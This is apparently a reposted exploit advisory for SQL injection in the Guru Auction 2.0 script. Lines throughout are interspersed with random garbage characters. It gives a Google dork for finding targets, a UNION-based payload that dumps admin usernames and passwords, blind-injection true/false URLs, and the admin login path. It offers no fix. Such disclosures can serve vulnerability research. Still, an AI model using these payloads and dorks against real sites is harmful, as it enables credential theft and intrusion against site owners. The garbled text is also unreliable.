Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
6 W# A/ {1 J$ P3 o; U# B: g) G
5 w% {3 \5 m; k! e作者 : v3n0m
1 T3 Y1 W2 k Z应用 : Guru Auction 2.0% I6 C$ E2 b( q( ^* u1 @
Price : $49
/ D( B" z, l6 g$ n! Y. _8 `Vendor : http://www.guruscript.com/
9 C+ j! K- w0 \, C; yGoogle Dork : inurl:subcat.php?cate_id=
" J$ F5 f+ v: ]! n" C& { * P3 T V' y# h. d" h; \/ c
SQLi p0c:% }# r" p5 p) \' v- ~
~~~~~~~~~~
0 i2 q7 p+ A$ W( p$ G! u8 Z1 Vhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
. l" O) q/ @+ o; @4 C* y8 n
; H6 [% l1 m0 k6 N4 ?" l4 P
6 `5 [3 @" a$ K0 L* s6 M2 H盲注 p0c:
3 o7 E) A; g N. u$ y~~~~~~~~~~
( l1 S% x/ J# I \" Lhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true/ ~, ? C" \! c# G. R$ V
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
, g, A" h! F/ F- d . m: v& u$ g/ r2 l/ u8 P9 W
管理登录入口:0 S, k9 a/ c/ U- U
~~~~~~~~~~ N; Y% I; T2 T1 k" x) {1 V7 q
http://domain.tld/[path]/admin/9 m4 v7 `- M S+ j
|